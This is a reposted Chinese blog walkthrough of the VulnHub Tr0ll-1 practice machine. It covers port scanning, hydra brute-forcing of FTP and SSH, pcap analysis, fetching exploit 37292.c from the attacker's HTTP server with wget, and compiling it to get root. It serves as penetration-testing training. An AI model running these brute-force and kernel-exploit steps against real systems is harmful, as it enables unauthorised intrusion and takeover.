gpt4 book ai didi

Tr0ll-1项目实战

转载 作者:我是一只小鸟 更新时间:2023-06-19 06:31:09 24 4
gpt4 key购买 nike

前言

Tr0ll的灵感来源于OSCP实验室内机器的不断拖动.

目标很简单,获取root并从/root目录中获取Proof.txt.

不适合那些容易受挫的人!公平的警告,前方有巨魔! 。

靶机环境

kali 192.168.31.153 Tr0ll-1 192.168.31.35 靶机下载地址: https://www.vulnhub.com/entry/tr0ll-1,100/ 。

渗透实战

环境搭建成功,使用nmap扫描网段ip探测存活主机 。

                        
                          nmap 192.168.31.0/24

                        
                      

浏览器访问主机http://192.168.31.35,发现是一个暴走图 。

查看页面js源码也是没有任何线索,正常思路走就是对主机web页面和ip进行信息收集 首先我用nmap详细扫描ip的端口信息 。

                        
                          nmap 192.168.31.35 -sV -O -p-   //扫描全端口信息,版本信息,操作系统

                        
                      

此处发现了21 22 80端口 且操作系统是ubuntu的linux系统,先放一边,接下来就是扫描文件目录 。

                        
                          python3 dirsearch.py -u http://192.168.31.35/ -e*

                        
                      

发现了一个文件robots.txt,添加访问路径查看有一个/secret目录,访问又是一个暴走图并没有有用的线索 。

现在只能从端口入手,首先尝试ftp端口,利用hydra爆破用户名密码 。

                        
                          hydra -L user.txt -P password.txt  192.168.31.35 -s 21 ftp

                        
                      

得到了用户名为 Anonymous 和一堆弱密码(这里由于爆破时间有点长,只截取了一部分) 。

但是我看网上可以尝试无密码直接登录成功 。

                        
                          ftp 192.168.31.35
回车完显示需要输入用户名,再回车一次
然后直接登录

                        
                      

回车完发现了有一串英文,意思是此FTP服务器仅为匿名服务器,可以使用图中的英文anonymous无密码登录,为什么使用这个英文呢,是因为目前没有其他线索了,我尝试了其他用户名又是不可以 。

紧接着就是查找新线索,使用ls查看文件,发现有一个流量包lol.pcap 。

在ftp服务器里使用 get lol.pcap将流量包下载到本地 。

                        
                          get lol.pcap

                        
                      

使用wireshark查看流量包 。

右键点击第一个流量包,追踪TCP流,发现提示是将一些二进制代码放在secret_stuff.txt文本里 。

修改刚刚圈出来在地址框的代码,把0改到2,看到提示说找到一个sup3rs3cr3tdirlol,看到这串字符有dir字样,猜测应该是一个文件或者文件夹 。

到浏览器访问看看http://192.168.31.35/sup3rs3cr3tdirlol,发现也是一个目录,里边还有一个未知文件 roflmao 。

使用kali的wget命令下载到本地查看 。

                        
                          wget http://192.168.31.35/sup3rs3cr3tdirlol/roflmao


                        
                      

可以利用kali的文件解析命令获取线索,这里我使用strings命令 。

                        
                          strings roflmao

                        
                      

得到了一堆提示,其中有一段英文提示Find address 0x0856BF to proceed,查找0x0856BF这个地址,再次利用浏览器访问http://192.168.31.35/0x0856BF查看 。

又是一个目录,一个套着一个,这谁猜得到哦... 查看两个目录,发现了是一个用户名字典和密码字典 。

到这突然意识到,应该是ssh的用户和密码,再次使用hydra爆破ssh端口 。

                        
                          hydra -L which_one_lol.txt -p Pass.txt  192.168.31.35  ssh


                        
                      

一开始使用的是密码文本的参数-P 但是多次爆破均没用,然后换了-p发现密码居然是Pass.txt,又是一个坑 登录ssh 。

                        
                          ssh overflow@192.168.31.35
Pass.txt

                        
                      

直接获取到webshell了,接着就是提权getshell 。

                        
                          使用python获取linux框架shell
python -c 'import pty;pty.spawn("/bin/bash")'

                        
                      

开始内网信息收集,查看内核版本信息 。

                        
                          cat /proc/version

                        
                      

发现是Linux ubuntu 3.13.0版本,老规矩,浏览器搜索漏洞poc或者使用kali的searchsploit命令查看poc脚本 这里为了方便演示,我使用searchsploit命令 。

                        
                          searchsploit Linux ubuntu 3.13.0

                        
                      

使用第一个c脚本,先将脚本复制到/root下方便操作,再者使用cat查看脚本如何使用 。

                        
                          find / -name 37292.c
cp /usr/share/exploitdb/exploits/linux/local/37292.c 37292.c
ls
cat 37292.c

                        
                      

脚本提示需要下载到靶机,使用gcc编译再执行,python3开启http服务,在靶机后台wget下载脚本,但是此处又有一个坑,发现后台并不能随意下载 。

                        
                          kali:
python3 -m http.server 8989

Tr0ll-1:
find / -writable 2>/dev/null   //查看可写入权限的文件

                        
                      

发现有一个临时目录/tmp可写入,进入tmp文件夹,将脚本下载到tmp 。

                        
                          cd /tmp

wget http://192.168.31.153:8989/37292.c

                        
                      

下载完毕,使用gcc编译37292.c 。

                        
                          gcc 37292.c -o shell
-o:将编译完的exp存储在自行定义的文件里
chmod +x shell  //添加执行权限
./shell    //开始执行
id
cd /root
cat proof.txt

                        
                      

总结

1.从nmap扫描到端口再到hydra破解端口 2.使用wireshark流量分析lol.pcap包获取线索 3.strings解析二进制文件查找提示信息 4.利用已知内核漏洞提权getshell 5.最后这个靶机在查看到有很多地方可以写入权限,方法不止一个,但是我这里仅展示最简单的提权方法:利用已知漏洞获取权限 其他拓展思路可以参考此博客: https://blog.csdn.net/weixin_44807430/article/details/128707254 。

最后此篇关于Tr0ll-1项目实战的文章就讲到这里了,如果你想了解更多关于Tr0ll-1项目实战的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com